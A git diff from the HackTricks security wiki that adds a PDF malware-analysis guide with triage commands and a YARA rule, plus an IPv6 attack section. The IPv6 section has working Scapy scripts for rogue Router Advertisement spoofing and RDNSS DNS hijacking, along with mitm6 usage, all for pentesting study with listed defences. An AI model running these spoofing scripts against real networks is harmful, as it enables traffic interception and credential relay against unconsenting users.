Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

Author: carlospolop

src/SUMMARY.md

@@ -32,6 +32,8 @@
   - [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
   - [Detecting Phishing](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
   - [Discord Invite Hijacking](generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md)
+  - [Homograph Attacks](generic-methodologies-and-resources/phishing-methodology/homograph-attacks.md)
+  - [Mobile Phishing Malicious Apps](generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md)
   - [Phishing Files & Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md)
 - [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md)
   - [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md)

src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md

@@ -17,6 +17,94 @@ For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://gith
 
 For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject.
 
+## Common Malicious Constructs
+
+Attackers often abuse specific PDF objects and actions that automatically execute when the document is opened or interacted with. Keywords worth hunting for:
+
+* **/OpenAction, /AA** – automatic actions executed on open or on specific events.
+* **/JS, /JavaScript** – embedded JavaScript (often obfuscated or split across objects).
+* **/Launch, /SubmitForm, /URI, /GoToE** – external process / URL launchers.
+* **/RichMedia, /Flash, /3D** – multimedia objects that can hide payloads.
+* **/EmbeddedFile /Filespec** – file attachments (EXE, DLL, OLE, etc.).
+* **/ObjStm, /XFA, /AcroForm** – object streams or forms commonly abused to hide shell-code.
+* **Incremental updates** – multiple %%EOF markers or a very large **/Prev** offset may indicate data appended after signing to bypass AV.
+
+When any of the previous tokens appear together with suspicious strings (powershell, cmd.exe, calc.exe, base64, etc.) the PDF deserves deeper analysis.
+
+---
+
+## Static analysis cheat-sheet
+
+```bash
+# Fast triage – keyword statistics
+pdfid.py suspicious.pdf
+
+# Deep dive – decompress/inspect the object tree
+pdf-parser.py -f suspicious.pdf                # interactive
+pdf-parser.py -a suspicious.pdf                # automatic report
+
+# Search for JavaScript and pretty-print it
+pdf-parser.py -search "/JS" -raw suspicious.pdf | js-beautify -
+
+# Dump embedded files
+peepdf "open suspicious.pdf" "objects embeddedfile" "extract 15 16 17" -o dumps/
+
+# Remove passwords / encryptions before processing with other tools
+qpdf --password='secret' --decrypt suspicious.pdf clean.pdf
+
+# Lint the file with a Go verifier (checks structure violations)
+pdfcpu validate -mode strict clean.pdf
+```
+
+Additional useful projects (actively maintained 2023-2025):
+* **pdfcpu** – Go library/CLI able to *lint*, *decrypt*, *extract*, *compress* and *sanitize* PDFs.
+* **pdf-inspector** – browser-based visualizer that renders the object graph and streams.
+* **PyMuPDF (fitz)** – scriptable Python engine that can safely render pages to images to detonate embedded JS in a hardened sandbox.
+
+---
+
+## Recent attack techniques (2023-2025)
+
+* **MalDoc in PDF polyglot (2023)** – JPCERT/CC observed threat actors appending an MHT-based Word document with VBA macros after the final **%%EOF**, producing a file that is both a valid PDF and a valid DOC. AV engines parsing just the PDF layer miss the macro. Static PDF keywords are clean, but `file` still prints `%PDF`. Treat any PDF that also contains the string `<w:WordDocument>` as highly suspicious.
+* **Shadow-incremental updates (2024)** – adversaries abuse the incremental update feature to insert a second **/Catalog** with malicious `/OpenAction` while keeping the benign first revision signed. Tools that inspect only the first xref table are bypassed.
+* **Font parsing UAF chain – CVE-2024-30284 (Acrobat/Reader)** – a vulnerable **CoolType.dll** function can be reached from embedded CIDType2 fonts, allowing remote code execution with the privileges of the user once a crafted document is opened. Patched in APSB24-29, May 2024.
+
+---
+
+## YARA quick rule template
+
+```yara
+rule Suspicious_PDF_AutoExec {
+    meta:
+        description = "Generic detection of PDFs with auto-exec actions and JS"
+        author      = "HackTricks"
+        last_update = "2025-07-20"
+    strings:
+        $pdf_magic = { 25 50 44 46 }          // %PDF
+        $aa        = "/AA" ascii nocase
+        $openact   = "/OpenAction" ascii nocase
+        $js        = "/JS" ascii nocase
+    condition:
+        $pdf_magic at 0 and ( all of ($aa, $openact) or ($openact and $js) )
+}
+```
+
+---
+
+## Defensive tips
+
+1. **Patch fast** – keep Acrobat/Reader on the latest Continuous track; most RCE chains observed in the wild leverage n-day vulnerabilities fixed months earlier.
+2. **Strip active content at the gateway** – use `pdfcpu sanitize` or `qpdf --qdf --remove-unreferenced` to drop JavaScript, embedded files and launch actions from inbound PDFs.
+3. **Content Disarm & Reconstruction (CDR)** – convert PDFs to images (or PDF/A) on a sandbox host to preserve visual fidelity while discarding active objects.
+4. **Block rarely-used features** – enterprise “Enhanced Security” settings in Reader allow disabling of JavaScript, multimedia and 3D rendering.
+5. **User education** – social engineering (invoice & resume lures) remains the initial vector; teach employees to forward suspicious attachments to IR.
+
+## References
+
+* JPCERT/CC – “MalDoc in PDF – Detection bypass by embedding a malicious Word file into a PDF file” (Aug 2023)  
+* Adobe – Security update for Acrobat and Reader (APSB24-29, May 2024)
+
+
 {{#include ../../../banners/hacktricks-training.md}}
 
 

src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md

@@ -112,12 +112,191 @@ To identify IPv6 addresses, certain DNS record types can be queried:
 
 After pinpointing IPv6 addresses associated with an organization, the `ping6` utility can be used for probing. This tool helps in assessing the responsiveness of identified IPv6 addresses, and might also assist in discovering adjacent IPv6 devices.
 
+## IPv6 Local Network Attack Techniques
+
+The following sections cover practical layer-2 IPv6 attacks that can be executed **inside the same /64 segment** without knowing any global prefix.  All the packets shown below are **link-local** and travel only through the local switch, making them extremely stealthy in most environments.
+
+### System Tuning for a Stable Lab
+
+Before playing with IPv6 traffic it is recommended to harden your box to avoid being poisoned by your own tests and to get the best performance during massive packet injection/sniffing.
+
+```bash
+# Enable promiscuous mode to capture all frames
+sudo ip link set dev eth0 promisc on
+
+# Ignore rogue Router Advertisements & Redirects coming from the segment
+sudo sysctl -w net.ipv6.conf.all.accept_ra=0
+sudo sysctl -w net.ipv6.conf.all.accept_redirects=0
+
+# Increase fd / backlog limits when generating lots of traffic
+sudo sysctl -w fs.file-max=100000
+sudo sysctl -w net.core.somaxconn=65535
+sudo sysctl -w net.ipv4.tcp_tw_reuse=1
+```
+
+### Passive NDP & DHCPv6 Sniffing
+
+Because every IPv6 host **automatically joins multiple multicast groups** (`ff02::1`, `ff02::2`, …) and speaks ICMPv6 for SLAAC/NDP, you can map the whole segment without sending a single packet.  The following Python/Scapy one-liner listens for the most interesting L2 messages and prints a colored, timestamped log of who is who:
+
+```python
+#!/usr/bin/env python3
+from scapy.all import *
+from scapy.layers.dhcp6 import *
+from datetime import datetime
+from colorama import Fore, Style, init
+import argparse
+
+init(autoreset=True)
+
+# Human-readable names for protocols we care about
+DHCP6_TYPES = {
+    DHCP6_Solicit:    'Solicit',
+    DHCP6_Advertise:  'Advertise',
+    DHCP6_Request:    'Request',
+    DHCP6_Reply:      'Reply',
+    DHCP6_Renew:      'Renew',
+    DHCP6_Rebind:     'Rebind',
+    DHCP6_RelayForward:'Relay-Forward',
+    DHCP6_RelayReply: 'Relay-Reply'
+}
+ICMP6_TYPES = {
+    ICMPv6ND_RS:      ('Router Solicitation',  Fore.CYAN),
+    ICMPv6ND_RA:      ('Router Advertisement', Fore.GREEN),
+    ICMPv6ND_NS:      ('Neighbor Solicitation',Fore.BLUE),
+    ICMPv6ND_NA:      ('Neighbor Advertisement',Fore.MAGENTA),
+    ICMPv6ND_Redirect:('Redirect',             Fore.LIGHTRED_EX),
+    ICMPv6MLReport:   ('MLD Report',           Fore.LIGHTCYAN_EX),
+    ICMPv6MLReport2:  ('MLD Report',           Fore.LIGHTCYAN_EX),
+    ICMPv6MLDone:     ('MLD Done',             Fore.LIGHTCYAN_EX),
+    ICMPv6EchoRequest:('Echo Request',         Fore.LIGHTBLACK_EX),
+    ICMPv6EchoReply:  ('Echo Reply',           Fore.LIGHTBLACK_EX)
+}
+
+def handler(pkt):
+    eth_src = pkt[Ether].src if Ether in pkt else '?'
+    eth_dst = pkt[Ether].dst if Ether in pkt else '?'
+    ip6_src = pkt[IPv6].src if IPv6 in pkt else '?'
+    ip6_dst = pkt[IPv6].dst if IPv6 in pkt else '?'
+
+    # Identify protocol family first
+    for proto,(desc,color) in ICMP6_TYPES.items():
+        if proto in pkt:
+            break
+    else:
+        if UDP in pkt and pkt[UDP].dport == 547:  # DHCPv6 server port
+            for dhcp_t,name in DHCP6_TYPES.items():
+                if dhcp_t in pkt:
+                    desc = 'DHCPv6 – '+name; color = Fore.YELLOW; break
+            else:
+                return  # not a DHCPv6 message we track
+        else:
+            return  # not interesting
+
+    print(color + f"[{datetime.now().strftime('%H:%M:%S')}] {desc}")
+    print(f"  MAC  {eth_src} -> {eth_dst}")
+    print(f"  IPv6 {ip6_src} -> {ip6_dst}")
+    print('-'*60)
+
+if __name__ == '__main__':
+    argp = argparse.ArgumentParser(description='IPv6 NDP & DHCPv6 sniffer')
+    argp.add_argument('-i','--interface',required=True,help='Interface to sniff')
+    argp.add_argument('-t','--time',type=int,default=0,help='Duration (0 = infinite)')
+    a = argp.parse_args()
+    sniff(iface=a.interface,prn=handler,timeout=a.time or None,store=0)
+```
+
+Result: a full **link-local topology** (MAC ⇄ IPv6) in a matter of seconds, without triggering IPS/IDS systems that rely on active scans.
+
+### Router Advertisement (RA) Spoofing
+
+IPv6 hosts rely on **ICMPv6 Router Advertisements** for default-gateway discovery.  If you inject forged RAs **more frequently** than the legitimate router, devices will silently switch to you as the gateway.
+
+```python
+#!/usr/bin/env python3
+from scapy.all import *
+import argparse
+
+p = argparse.ArgumentParser()
+p.add_argument('-i','--interface',required=True)
+p.add_argument('-m','--mac',required=True,help='Source MAC (will be put in SrcLL option)')
+p.add_argument('--llip',required=True,help='Link-local source IP, e.g. fe80::dead:beef')
+p.add_argument('-l','--lifetime',type=int,default=1800,help='Router lifetime')
+p.add_argument('--interval',type=int,default=5,help='Seconds between RAs')
+p.add_argument('--revert',action='store_true',help='Send lifetime=0 to undo attack')
+args = p.parse_args()
+
+lifetime = 0 if args.revert else args.lifetime
+ra = (IPv6(src=args.llip,dst='ff02::1',hlim=255)/
+      ICMPv6ND_RA(routerlifetime=lifetime, prf=0x1)/  # High preference
+      ICMPv6NDOptSrcLLAddr(lladdr=args.mac))
+
+send(ra,iface=args.interface,loop=1,inter=args.interval)
+```
+
+To actually **forward traffic** after winning the race:
+
+```bash
+sudo sysctl -w net.ipv6.conf.all.forwarding=1
+sudo ip6tables -A FORWARD -i eth0 -j ACCEPT
+sudo ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
+```
+
+### RDNSS (DNS) Spoofing via RA
+
+[RFC 8106](https://datatracker.ietf.org/doc/html/rfc8106) allows adding a **Recursive DNS Server (RDNSS)** option inside a RA.  Modern OSes (Win 10 ≥1709, Win 11, macOS Big Sur, Linux systemd-resolved, …) automatically trust it:
+
+```python
+#!/usr/bin/env python3
+from scapy.all import *
+import argparse
+
+p = argparse.ArgumentParser()
+p.add_argument('-i','--interface',required=True)
+p.add_argument('--llip',required=True)
+p.add_argument('--dns',required=True,help='Fake DNS IPv6')
+p.add_argument('--lifetime',type=int,default=600)
+p.add_argument('--interval',type=int,default=5)
+args = p.parse_args()
+
+ra = (IPv6(src=args.llip,dst='ff02::1',hlim=255)/
+      ICMPv6ND_RA(routerlifetime=0)/
+      ICMPv6NDOptRDNSS(dns=[args.dns],lifetime=args.lifetime))
+
+send(ra,iface=args.interface,loop=1,inter=args.interval)
+```
+
+Clients will **prepend** your DNS to their resolver list for the given lifetime, granting full DNS hijacking until the value expires or you send a `lifetime=0` revert.
+
+### DHCPv6 DNS Spoofing (mitm6)
+
+Instead of SLAAC, Windows networks often depend on **stateless DHCPv6** for DNS.  [mitm6](https://github.com/rofl0r/mitm6) automatically replies to `Solicit` messages with an **Advertise → Reply** flow that assigns **your link-local address as DNS for 300 seconds**.  This unlocks:
+
+* NTLM relay attacks (WPAD + DNS hijacking)
+* Intercepting internal name resolution without touching routers
+
+Typical usage:
+
+```bash
+sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning
+```
+
+### Defences
+
+* **RA Guard / DHCPv6 Guard / ND Inspection** on managed switches.
+* Port ACLs that allow only the legitimate router’s MAC to send RAs.
+* Monitor for **unsolid high-rate RAs** or sudden **RDNSS changes**.
+* Disabling IPv6 on endpoints is a temporary workaround that often breaks modern services and hides blind spots – prefer L2 filtering instead.
+
+
+
 ## References
 
+- [Legless – IPv6 Penetration Testing](https://blog.exploit.org/caster-legless/)
+- [mitm6](https://github.com/rofl0r/mitm6)
+- [RFC 8106 – IPv6 ND DNS Configuration](https://datatracker.ietf.org/doc/html/rfc8106)
 - [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html)
 - [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904)
 
 {{#include ../../banners/hacktricks-training.md}}
 
 
-

src/generic-methodologies-and-resources/phishing-methodology/README.md

@@ -25,6 +25,10 @@
 - **hypened subdomain**: Change the **dot for a hyphen** of a subdomain (e.g., www-zelster.com).
 - **New TLD**: Same domain using a **new TLD** (e.g., zelster.org)
 - **Homoglyph**: It **replaces** a letter in the domain name with **letters that look similar** (e.g., zelfser.com).
+
+{{#ref}}
+homograph-attacks.md
+{{#endref}}
 - **Transposition:** It **swaps two letters** within the domain name (e.g., zelsetr.com).
 - **Singularization/Pluralization**: Adds or removes “s” at the end of the domain name (e.g., zeltsers.com).
 - **Omission**: It **removes one** of the letters from the domain name (e.g., zelser.com).
@@ -466,6 +470,12 @@ Attackers can silently copy malicious commands into the victim’s clipboard fro
 clipboard-hijacking.md
 {{#endref}}
 
+## Mobile Phishing & Malicious App Distribution (Android & iOS)
+
+{{#ref}}
+mobile-phishing-malicious-apps.md
+{{#endref}}
+
 ## References
 
 - [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)